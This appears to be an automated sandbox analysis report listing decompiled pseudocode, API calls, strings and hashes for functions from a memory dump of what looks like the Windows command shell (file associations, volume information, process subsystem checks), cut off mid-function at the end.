
Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

_get_osfhandle.MSVCRT ref: 0033DAA6
_get_osfhandle.MSVCRT ref: 0033DAB7
??_V@YAXPAX@Z.MSVCRT ref: 0033DB53

Strings

DPATH, xrefs: 0034BAB0

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: _get_osfhandlememset
String ID: DPATH
API String ID: 3784859044-2010427443
Opcode ID: 8cdae734c2c236af26015a70f69c31f82b28761d4867ca78e2b54d60d3d2140e
Instruction ID: 72aa13148c95d17d39d655ad34e03a72d6f6584f68bc1b39648f26f4191b9f89
Opcode Fuzzy Hash: 8cdae734c2c236af26015a70f69c31f82b28761d4867ca78e2b54d60d3d2140e
Instruction Fuzzy Hash: 0F91F535A00216ABCB27AF64ECC5AAAF7F5FF44310F154659E409AF291DB70ED90CB90

Uniqueness

Uniqueness Score: -1.00%

Function 003559E6, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 211
registryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E003559E6(void* __ecx, signed int __edx, char* _a4) {
				signed int _v8;
				short _v528;
				signed int _v532;
				void* _v536;
				void* _v540;
				long _v544;
				int _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				intOrPtr _t41;
				short* _t44;
				signed short* _t52;
				char _t55;
				signed short _t62;
				long _t67;
				signed short _t69;
				signed int _t71;
				short* _t73;
				signed int _t75;
				char* _t85;
				void* _t88;
				signed short _t90;
				char* _t93;
				intOrPtr* _t94;
				signed short* _t98;
				void* _t99;
				signed int _t100;

				_t39 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t39 ^ _t100;
				_t75 = __edx;
				_v540 = __ecx;
				_t94 = __edx;
				_v532 = __edx;
				_t93 = _a4;
				_t90 = __edx + 2;
				do {
					_t41 =  *_t94;
					_t94 = _t94 + 2;
				} while (_t41 != 0);
				if((_t94 - _t90 >> 1) + 0x14 <= 0x104) {
					E00341040( &_v528, 0x104, __edx);
					_t90 = 0x104;
					_t44 =  &_v528;
					while( *_t44 != 0) {
						_t44 = _t44 + 2;
						_t90 = _t90 - 1;
						if(_t90 != 0) {
							continue;
						}
						break;
					}
					asm("sbb ecx, ecx");
					_t82 =  ~_t90 & 0x00000104 - _t90;
					if(_t90 != 0) {
						_t73 =  &(( &_v528)[_t82]);
						_t99 = 0x104 - _t82;
						if(_t99 == 0) {
							L15:
							_t73 = _t73 - 2;
						} else {
							_t88 = 0x7ffffffe;
							_t90 = L"\\Shell\\Open\\Command" - _t73;
							while(_t88 != 0) {
								_t75 = _v532;
								if(( *(_t73 + _t90) & 0x0000ffff) == 0) {
									break;
								} else {
									_t88 = _t88 - 1;
									 *_t73 =  *(_t73 + _t90) & 0x0000ffff;
									_t73 =  &(_t73[1]);
									_t75 = _v532;
									_t99 = _t99 - 1;
									if(_t99 != 0) {
										continue;
									} else {
										goto L15;
									}
								}
								goto L16;
							}
							if(_t99 == 0) {
								goto L15;
							}
						}
						L16:
						_t82 = 0;
						 *_t73 = 0;
					}
					_t98 = RegOpenKeyExW(_v540,  &_v528, 0, 0x2000000,  &_v536);
					if(_t98 == 0) {
						L30:
						if(_t93 == 0 ||  *_t93 == 0) {
							_t98 = RegDeleteValueW(_v536, 0);
							if(_t98 != 0) {
								E0033C5A2(_t82, 0x400023a5, 1, _t75);
								goto L39;
							}
						} else {
							_t85 = _t93;
							_t90 =  &(_t85[2]);
							do {
								_t55 =  *_t85;
								_t85 =  &(_t85[2]);
							} while (_t55 != 0);
							_t87 = _t85 - _t90 >> 1;
							_t98 = RegSetValueExW(_v536, 0x3324ac, 0, 2, _t93, 2 + (_t85 - _t90 >> 1) * 2);
							if(_t98 != 0) {
								_push(0);
								_push(_t98);
								E0033C5A2(_t87);
								E0033C5A2(_t87, 0x235d, 1, _t75);
							} else {
								_push(_t93);
								_push(_t75);
								E003425D9(L"%s=%s\r\n");
								L39:
							}
						}
						RegCloseKey(_v536);
						goto L41;
					} else {
						if(_t93 == 0 ||  *_t93 == 0) {
							E0033C5A2(_t82, 0x400023a5, 1, _t75);
							L41:
							_t52 = _t98;
						} else {
							_t98 =  &_v528;
							while(1) {
								_t62 =  *_t98 & 0x0000ffff;
								_t82 = _t62;
								_v532 = _t62;
								if(_t62 == 0) {
									goto L25;
								}
								_t90 = _t62;
								while(1) {
									_t82 = _t90 & 0x0000ffff;
									_v532 = _t90 & 0x0000ffff;
									if(_t90 == 0x5c) {
										goto L25;
									}
									_t71 = _t98[1] & 0x0000ffff;
									_t98 =  &(_t98[1]);
									_t82 = _t71;
									_t90 = _t71;
									_v532 = _t71;
									if(_t71 != 0) {
										continue;
									}
									goto L25;
								}
								L25:
								 *_t98 = 0;
								_t67 = RegCreateKeyExW(_v540,  &_v528, 0, 0, 0, 0x2000000, 0,  &_v536,  &_v548);
								_v544 = _t67;
								if(_t67 != 0) {
									E0033C5A2(_t82, 0x400023a5, 1, _t75);
									_t52 = _v544;
								} else {
									_t69 = _v532;
									if(_t69 == 0) {
										goto L30;
									} else {
										 *_t98 = _t69;
										_t98 =  &(_t98[1]);
										RegCloseKey(_v536);
										continue;
									}
								}
								goto L42;
							}
						}
					}
				} else {
					_push(0);
					_push(0x400023db);
					E0033C5A2(__ecx);
					_t52 = 1;
				}
				L42:
				return E00346FD0(_t52, _t75, _v8 ^ _t100, _t90, _t93, _t98);
			}

0x003559f1
0x003559f8
0x003559fc
0x003559fe
0x00355a05
0x00355a07
0x00355a0e
0x00355a11
0x00355a16
0x00355a16
0x00355a19
0x00355a1c
0x00355a2d
0x00355a56
0x00355a5b
0x00355a5d
0x00355a66
0x00355a6c
0x00355a6f
0x00355a72
0x00000000
0x00000000
0x00000000
0x00355a72
0x00355a7c
0x00355a7e
0x00355a82
0x00355a8a
0x00355a8d
0x00355a8f
0x00355acc
0x00355acc
0x00355a91
0x00355a96
0x00355a9b
0x00355a9d
0x00355aa8
0x00355aae
0x00000000
0x00355ab0
0x00355ab4
0x00355ab5
0x00355ab8
0x00355abb
0x00355ac1
0x00355ac4
0x00000000
0x00355ac6
0x00000000
0x00355ac6
0x00355ac4
0x00000000
0x00355aae
0x00355aca
0x00000000
0x00000000
0x00355aca
0x00355acf
0x00355acf
0x00355ad1
0x00355ad1
0x00355af5
0x00355af9
0x00355bdd
0x00355bdf
0x00355c55
0x00355c59
0x00355c63
0x00000000
0x00355c63
0x00355be7
0x00355be7
0x00355be9
0x00355bec
0x00355bec
0x00355bef
0x00355bf2
0x00355bf9
0x00355c19
0x00355c1d
0x00355c2d
0x00355c2f
0x00355c30
0x00355c3d
0x00355c1f
0x00355c1f
0x00355c20
0x00355c26
0x00355c68
0x00355c68
0x00355c1d
0x00355c71
0x00000000
0x00355aff
0x00355b01
0x00355bd0
0x00355c77
0x00355c77
0x00355b11
0x00355b11
0x00355b17
0x00355b17
0x00355b1a
0x00355b1c
0x00355b25
0x00000000
0x00000000
0x00355b27
0x00355b29
0x00355b29
0x00355b2c
0x00355b36
0x00000000
0x00000000
0x00355b38
0x00355b3c
0x00355b3f
0x00355b41
0x00355b43
0x00355b4c
0x00000000
0x00000000
0x00000000
0x00355b4c
0x00355b4e
0x00355b50
0x00355b7b
0x00355b81
0x00355b89
0x00355bb5
0x00355bba
0x00355b8b
0x00355b8b
0x00355b94
0x00000000
0x00355b96
0x00355b9c
0x00355b9f
0x00355ba2
0x00000000
0x00355ba2
0x00355b94
0x00000000
0x00355b89
0x00355b17
0x00355b01
0x00355a2f
0x00355a2f
0x00355a31
0x00355a36
0x00355a3e
0x00355a3e
0x00355c79
0x00355c89

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?), ref: 00355AEF
RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 00355B7B
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00355BA2
RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,003324AC,00000000,00000002,?,00000000), ref: 00355C13
RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000), ref: 00355C4F
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00355C71

Strings

%s=%s, xrefs: 00355C21
\Shell\Open\Command, xrefs: 00355A91

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseValue$CreateDeleteOpen
String ID: %s=%s$\Shell\Open\Command
API String ID: 4081037667-3301834661
Opcode ID: 383b99275f208eb356b3618fd0be6b7945edf68d6823c5a72ae234dd5824ede1
Instruction ID: 8b88fa1abf06d96e316309cabdbb1cd33ed49a419b97e30f81a1463bc3355e06
Opcode Fuzzy Hash: 383b99275f208eb356b3618fd0be6b7945edf68d6823c5a72ae234dd5824ede1
Instruction Fuzzy Hash: 58713C75D406199BDB335B18CC99FE973B8EF54701F150295FC09A72A0E770AE848B90

Uniqueness

Uniqueness Score: -1.00%

Function 00356B30, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00356B30(void* __ebx, signed short* _a4) {
				signed int _v8;
				char _v268;
				intOrPtr _v272;
				short _v276;
				short _v790;
				signed short _v802;
				long _v804;
				void* __edi;
				void* __esi;
				signed int _t20;
				short _t22;
				intOrPtr _t23;
				signed short _t24;
				void* _t29;
				signed short _t33;
				signed short _t34;
				long _t52;
				signed short* _t54;
				void* _t56;
				signed short* _t57;
				long _t60;
				void* _t66;
				long _t68;
				DWORD* _t70;
				signed short* _t71;
				void* _t72;
				signed short* _t74;
				void* _t75;
				signed int _t76;
				signed int _t78;
				signed int _t80;
				void* _t81;

				_t56 = __ebx;
				_t80 = (_t78 & 0xfffffff8) - 0x320;
				_t20 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t20 ^ _t80;
				_t22 =  *L" :\\"; // 0x3a0020
				_t74 = _a4;
				_t70 = 0;
				_v276 = _t22;
				_t23 =  *0x333a8c; // 0x5c
				_t68 =  *_t74 & 0x0000ffff;
				_v272 = _t23;
				_v804 = 0;
				if(_t68 != 0) {
					_t57 = _t74;
					_t71 =  &(_t57[1]);
					do {
						_t24 =  *_t57;
						_t57 =  &(_t57[1]);
					} while (_t24 != _v804);
					if(_t57 - _t71 >> 1 != 2 || _t74[1] != 0x3a || iswalpha(_t68) == 0) {
						E003425D9(L"\r\n");
						_pop(_t60);
						_push(0);
						_push(0xf);
						goto L19;
					} else {
						_t33 = towupper( *_t74 & 0x0000ffff);
						_t70 = 0;
						goto L10;
					}
				} else {
					_t54 =  *0x373cb8;
					if(_t54 == 0) {
						_t54 = 0x373ab0;
					}
					_t33 = towupper( *_t54 & 0x0000ffff);
					L10:
					_pop(_t66);
					_t34 = _t33 & 0x0000ffff;
					_t76 = _t34 & 0x0000ffff;
					_v276 = _t34;
					if(GetVolumeInformationW( &_v276,  &_v790, 0x101,  &_v804, _t70, _t70, _t70, _t70) != 0) {
						_push(_t76);
						_push(L"%c");
						_push(0x104);
						_push(0x373d00);
						if(_v790 == 0) {
							E0034274C();
							E0033C108(_t66, 0x235e, 1, 0x373d00);
							_t81 = _t80 + 0x1c;
						} else {
							E0034274C();
							_push( &_v790);
							E0033C108(_t66, 0x235f, 2, 0x373d00);
							_t81 = _t80 + 0x20;
						}
						_push(_v804 & 0x0000ffff);
						E0034274C( &_v268, 0x80, L"%04X-%04X", _v802 & 0x0000ffff);
						E0033C108(_t66, 0x235b, 1,  &_v268);
						_t80 = _t81 + 0x20;
						_t29 = 0;
					} else {
						E003425D9(L"\r\n");
						_t52 = GetLastError();
						_t60 = 0x15;
						if(_t52 != _t60) {
							_t60 = GetLastError();
						}
						_push(_t70);
						_push(_t60);
						L19:
						E0033C5A2(_t60);
						_t29 = 1;
					}
				}
				_pop(_t72);
				_pop(_t75);
				return E00346FD0(_t29, _t56, _v8 ^ _t80, _t68, _t72, _t75);
			}

0x00356b30
0x00356b38
0x00356b3e
0x00356b45
0x00356b4c
0x00356b52
0x00356b56
0x00356b58
0x00356b5f
0x00356b64
0x00356b67
0x00356b6e
0x00356b75
0x00356b91
0x00356b93
0x00356b96
0x00356b96
0x00356b99
0x00356b9c
0x00356baa
0x00356cc4
0x00356cc9
0x00356ccc
0x00356ccd
0x00000000
0x00356bcb
0x00356bcf
0x00356bd5
0x00000000
0x00356bd5
0x00356b77
0x00356b77
0x00356b7e
0x00356b80
0x00356b80
0x00356b89
0x00356bd7
0x00356bd7
0x00356bda
0x00356bde
0x00356be1
0x00356c09
0x00356c3a
0x00356c3b
0x00356c45
0x00356c4a
0x00356c4b
0x00356c69
0x00356c76
0x00356c7b
0x00356c4d
0x00356c4d
0x00356c56
0x00356c5f
0x00356c64
0x00356c64
0x00356c83
0x00356c9c
0x00356cb3
0x00356cb8
0x00356cbb
0x00356c0b
0x00356c10
0x00356c16
0x00356c1e
0x00356c21
0x00356c29
0x00356c29
0x00356c2b
0x00356c2c
0x00356ccf
0x00356ccf
0x00356cd7
0x00356cd8
0x00356c09
0x00356ce0
0x00356ce1
0x00356cec

APIs

towupper.MSVCRT ref: 00356B89
iswalpha.MSVCRT ref: 00356BBC
towupper.MSVCRT ref: 00356BCF
GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 00356C01
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00356C16
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00356C23

Strings

%04X-%04X, xrefs: 00356C8A
:\, xrefs: 00356B4C

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorLasttowupper$InformationVolumeiswalpha
String ID: :\$%04X-%04X
API String ID: 4001382275-3541097225
Opcode ID: 08be579b48800f8a6f5774ea77612f74318d6656f271c64406772a6a9039b428
Instruction ID: 55993ec2e49f97f06ed0a01b89eedc7fef445de1358f0a14411c4356a277bf92
Opcode Fuzzy Hash: 08be579b48800f8a6f5774ea77612f74318d6656f271c64406772a6a9039b428
Instruction Fuzzy Hash: 43414872604210AAD732AB659C47EBB77ECDF88B01F40441EFD89DB1D0EA74DA44D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0035587B, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 122
registryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E0035587B(void* __ebx, void* __ecx, short* __edx, void* __edi, void* __esi, void* __eflags) {
				char* _t23;
				char _t38;
				short* _t44;
				char* _t48;
				char* _t51;
				char* _t55;
				char* _t56;
				char* _t57;
				void* _t58;

				_t45 = __ecx;
				_push(0x18);
				_push(0x35c0e0);
				E00347678(__ebx, __edi, __esi);
				_t44 = __edx;
				 *(_t58 - 0x20) = __ecx;
				_t23 =  *(_t58 + 8);
				if(_t23 == 0 ||  *_t23 == 0) {
					__imp__RegDeleteKeyExW(_t45, _t44, 0, 0);
					_t55 = _t23;
					 *(_t58 - 0x1c) = _t55;
					if(_t55 == 0) {
						goto L16;
					}
					_t56 = RegOpenKeyExW( *(_t58 - 0x20), _t44, 0, 0x2000000, _t58 - 0x24);
					 *(_t58 - 0x1c) = _t56;
					if(_t56 == 0) {
						_t55 = RegDeleteValueW( *(_t58 - 0x24), 0x3324ac);
						 *(_t58 - 0x1c) = _t55;
						if(_t55 != 0) {
							_push(0);
							E0033C5A2(_t45);
							_t45 = _t55;
						}
						RegCloseKey( *(_t58 - 0x24));
					} else {
						if(_t56 != 2) {
							_push(0);
							E0033C5A2(_t45);
							_t45 = _t56;
						}
					}
					goto L15;
				} else {
					_t55 = RegCreateKeyExW(__ecx, __edx, 0, 0, 0, 2, 0, _t58 - 0x20, 0);
					 *(_t58 - 0x1c) = _t55;
					if(_t55 != 0) {
						L7:
						_push(0);
						_push(_t55);
						E0033C5A2(_t45);
						E0033C5A2(_t45, 0x235d, 1, _t44);
						goto L15;
					} else {
						_t51 =  *(_t58 + 8);
						_t48 = _t51;
						_t57 =  &(_t48[2]);
						do {
							_t38 =  *_t48;
							_t48 =  &(_t48[2]);
						} while (_t38 != 0);
						_t45 = _t48 - _t57 >> 1;
						_t55 = RegSetValueExW( *(_t58 - 0x20), 0, 0, 1, _t51, 2 + (_t48 - _t57 >> 1) * 2);
						 *(_t58 - 0x1c) = _t55;
						RegCloseKey( *(_t58 - 0x20));
						if(_t55 != 0) {
							goto L7;
						}
						_push( *(_t58 + 8));
						_push(_t44);
						E003425D9(L"%s=%s\r\n");
						L15:
						if(_t55 != 0) {
							L19:
							return E003476BD(_t55);
						}
						L16:
						 *((intOrPtr*)(_t58 - 4)) = 0;
						if(E00347797(_t45) != 0) {
							 *0x37c020(0x8000000, 0, 0, 0);
						}
						 *((intOrPtr*)(_t58 - 4)) = 0xfffffffe;
						goto L19;
					}
				}
			}

0x0035587b
0x0035587b
0x0035587d
0x00355882
0x00355887
0x00355889
0x0035588c
0x00355893
0x00355930
0x00355936
0x00355938
0x0035593d
0x00000000
0x00000000
0x00355953
0x00355955
0x0035595a
0x0035597a
0x0035597c
0x00355981
0x00355983
0x00355985
0x0035598b
0x0035598b
0x0035598f
0x0035595c
0x0035595f
0x00355961
0x00355963
0x00355969
0x00355969
0x0035595f
0x00000000
0x003558a2
0x003558b5
0x003558b7
0x003558bc
0x00355913
0x00355913
0x00355914
0x00355915
0x00355922
0x00000000
0x003558be
0x003558be
0x003558c1
0x003558c3
0x003558c6
0x003558c6
0x003558c9
0x003558cc
0x003558d3
0x003558eb
0x003558ed
0x003558f3
0x003558fb
0x00000000
0x00000000
0x003558fd
0x00355900
0x00355906
0x00355995
0x00355997
0x003559dc
0x003559e3
0x003559e3
0x00355999
0x00355999
0x003559a3
0x003559ad
0x003559ad
0x003559b3
0x00000000
0x003559b3
0x003558bc

APIs

RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0035C0E0,00000018,00354B14,00000000,00000003), ref: 003558AF
RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0035C0E0), ref: 003558E5
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,0035C0E0,00000018,00354B14,00000000,00000003), ref: 003558F3
RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,0035C0E0,00000018,00354B14,00000000,00000003), ref: 00355930
RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,0035C0E0,00000018,00354B14,00000000,00000003), ref: 0035594D
RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,003324AC,?,00000000,02000000,?,?,?,00000000,00000000,0035C0E0,00000018,00354B14,00000000,00000003), ref: 00355974
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,0035C0E0,00000018,00354B14,00000000,00000003), ref: 0035598F

Strings

%s=%s, xrefs: 00355901

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseDeleteValue$CreateOpen
String ID: %s=%s
API String ID: 1019019434-1087296587
Opcode ID: 21d36574f77fb1fa476ae173738d3e22939d2c01d82433905df5cf1b5fb5e0ad
Instruction ID: 409074b1d693d6870e84d9457195b1079460dfca19dfbf67a34e19d90101d7b2
Opcode Fuzzy Hash: 21d36574f77fb1fa476ae173738d3e22939d2c01d82433905df5cf1b5fb5e0ad
Instruction Fuzzy Hash: 90319371D01618FBDB336B568C09FAF7A7CEF89B61F054109FC097A161D7256D05CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 003553E0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 114
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E003553E0(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v968;
				intOrPtr _v1004;
				intOrPtr _v1140;
				void _v1148;
				void _v1152;
				void _v1156;
				void _v1160;
				long _v1164;
				void* _v1184;
				char _v1188;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				void* _t42;
				struct HINSTANCE__* _t47;
				void* _t62;
				void* _t63;
				signed int _t64;

				_t60 = __edx;
				_t22 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t22 ^ _t64;
				_t62 = __ecx;
				_v1152 = 0;
				if( *0x378104 != 0) {
					L4:
					_t63 =  *0x378100;
					L5:
					if(_t63 != 0) {
						 *0x3794b4(_t62, 0,  &_v1188, 0x18, 0);
						if( *_t63() >= 0) {
							_t63 = _v1184;
							if(ReadProcessMemory(_t62, _t63,  &_v1148, 0x470,  &_v1164) != 0) {
								if(_v1164 < 0xb4 || _v1004 - _t63 <= 0xb4) {
									if(ReadProcessMemory(_t62, _v1140 + 0x3c,  &_v1160, 4, 0) != 0 && ReadProcessMemory(_t62, _v1140 + _v1160 + 4,  &_v1156, 2, 0) != 0) {
										_t60 = _v1160 + _v1140 + 0x18;
										_t42 = E0035573B(_v1156, _v1160 + _v1140 + 0x18);
										if(_t42 != 0) {
											ReadProcessMemory(_t62, _t42,  &_v1152, 2, 0);
										}
									}
								} else {
									_v1152 = _v968;
								}
							}
						}
					}
					return E00346FD0(_v1152, 0, _v8 ^ _t64, _t60, _t62, _t63);
				}
				_t47 = LoadLibraryExW(L"NTDLL.DLL", 0, 0);
				 *0x378104 = _t47;
				if(_t47 == 0) {
					 *0x378104 =  *0x378104 | 0xffffffff;
					goto L4;
				} else {
					_t63 = GetProcAddress(_t47, "NtQueryInformationProcess");
					 *0x378100 = _t63;
					goto L5;
				}
			}

0x003553e0
0x003553eb
0x003553f2
0x003553fc
0x003553fe
0x0035540b
0x00355440
0x00355440
0x00355446
0x00355448
0x0035545c
0x00355466
0x0035546c
0x0035548f
0x003554a0
0x003554db
0x0035551a
0x0035551c
0x00355523
0x00355531
0x00355531
0x00355523
0x003554ae
0x003554b5
0x003554b5
0x003554a0
0x0035548f
0x00355466
0x0035554e
0x0035554e
0x00355414
0x0035541a
0x00355421
0x00355439
0x00000000
0x00355423
0x0035542f
0x00355431
0x00000000
0x00355431

APIs

LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 00355414
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 00355429
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000470,?), ref: 00355487
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 003554D3
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 003554FA
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 00355531

Strings

NTDLL.DLL, xrefs: 0035540F
NtQueryInformationProcess, xrefs: 00355423

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: MemoryProcessRead$AddressLibraryLoadProc
String ID: NTDLL.DLL$NtQueryInformationProcess
API String ID: 1580871199-2613899276
Opcode ID: 5b6ba7c250039193986a464944f646187d6003cbeb2d5ef534fef929b02cedfa
Instruction ID: b33f73d5e8d4f31c4574a0db705155ba0069febbab7be20de9f9405ded059d0e
Opcode Fuzzy Hash: 5b6ba7c250039193986a464944f646187d6003cbeb2d5ef534fef929b02cedfa
Instruction Fuzzy Hash: D041B4B1A001199BEB228F21DC84FBE777CEB55705F4141A9BA0DE7250DB30AE85CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00335DB5, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00335DB5(void* __ecx, signed int __edx) {
				long _v8;
				WCHAR* _v12;
				struct _SECURITY_ATTRIBUTES _v24;
				void* __ebx;
				signed int _t15;
				long _t17;
				void* _t19;
				long _t22;
				long _t23;
				WCHAR* _t32;
				signed int _t38;
				void* _t39;
				void* _t40;
				signed int _t42;

				_v24.lpSecurityDescriptor = _v24.lpSecurityDescriptor & 0x00000000;
				_t39 = __ecx;
				_v24.nLength = 0xc;
				_t23 = 3;
				_t41 = __edx;
				_t38 = __edx & _t23;
				_v24.bInheritHandle = 1;
				if(_t38 > 2) {
					L2:
					_t42 = _t41 | 0xffffffff;
					L3:
					return _t42;
				}
				_t15 = __edx & 0x00000009;
				if(_t15 != 9) {
					_push(L"con");
					_push(__ecx);
					if(_t38 != 0) {
						_t41 = (__edx | 1) << 0x1e;
						__imp___wcsicmp();
						if(_t15 != 0) {
							_t23 = 1;
						}
						_v8 = 2;
					} else {
						_t41 = 0x80000000;
						_v8 = 3;
						__imp___wcsicmp();
						if(_t15 == 0) {
							_t23 = 1;
						}
					}
					_t32 = E003422C0(_t23, _t39);
					_t17 = _v8;
					_v12 = _t32;
					if(_t17 == 2) {
						_t19 = CreateFileW(_t32, _t41, _t23,  &_v24, 3, 0x8000080, 0);
						_t40 = _t19;
						if(_t40 != 0xffffffff) {
							goto L8;
						}
						_t17 = _v8;
						_t32 = _v12;
						goto L7;
					} else {
						L7:
						_t19 = CreateFileW(_t32, _t41, _t23,  &_v24, _t17, 0x8000080, 0);
						_t40 = _t19;
						if(_t40 == 0xffffffff) {
							_t22 = GetLastError();
							 *0x373cf0 = _t22;
							if(_t22 == 0x6e) {
								 *0x373cf0 = 2;
							}
							goto L2;
						}
						L8:
						__imp___open_osfhandle(_t40, 8);
						_t42 = _t19;
						if(_t42 == 0xffffffff) {
							CloseHandle(_t40);
						}
						goto L3;
					}
				}
				goto L2;
			}

0x00335dbd
0x00335dc6
0x00335dc8
0x00335dcf
0x00335dd2
0x00335dd5
0x00335dd7
0x00335ddd
0x00335de8
0x00335de8
0x00335dec
0x00335df3
0x00335df3
0x00335de1
0x00335de6
0x00335df6
0x00335dfb
0x00335dfe
0x00349ce0
0x00349ce3
0x00349ced
0x00349cf1
0x00349cf1
0x00349cf2
0x00335e04
0x00335e04
0x00335e09
0x00335e10
0x00335e1a
0x00335e6d
0x00335e6d
0x00335e1a
0x00335e23
0x00335e25
0x00335e28
0x00335e2e
0x00349d0e
0x00349d14
0x00349d19
0x00000000
0x00000000
0x00349d1f
0x00349d22
0x00000000
0x00335e34
0x00335e34
0x00335e43
0x00335e49
0x00335e4e
0x00349d36
0x00349d3c
0x00349d44
0x00349d4a
0x00349d4a
0x00000000
0x00349d44
0x00335e54
0x00335e57
0x00335e5d
0x00335e64
0x00349d2b
0x00349d2b
0x00000000
0x00335e64
0x00335e2e
0x00000000

APIs

_wcsicmp.MSVCRT ref: 00335E10
CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,08000080,00000003,08000080,00000000), ref: 00335E43
_open_osfhandle.MSVCRT ref: 00335E57
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00349D2B

Strings

con, xrefs: 00335DF6

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
String ID: con
API String ID: 689241570-4257191772
Opcode ID: 3e79d12f28f9f121ae08c1631c0fbbf9e2d7781922cffefa296bf7d94ff81256
Instruction ID: 99e4dfdeb1b2df1d92d5a4b3d42ef7aa5ad2cf654218b369164303ed82b9396b
Opcode Fuzzy Hash: 3e79d12f28f9f121ae08c1631c0fbbf9e2d7781922cffefa296bf7d94ff81256
Instruction Fuzzy Hash: 0B312832A44515AFE7369B689CC9BAF77EDEB45731F21031AE825E72D0DB705E008690

Uniqueness

Uniqueness Score: -1.00%

Function 0035554F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0035554F(WCHAR* __ecx, void* __edx) {
				signed int _v8;
				long _v16;
				char _v76;
				signed short _v80;
				char _v96;
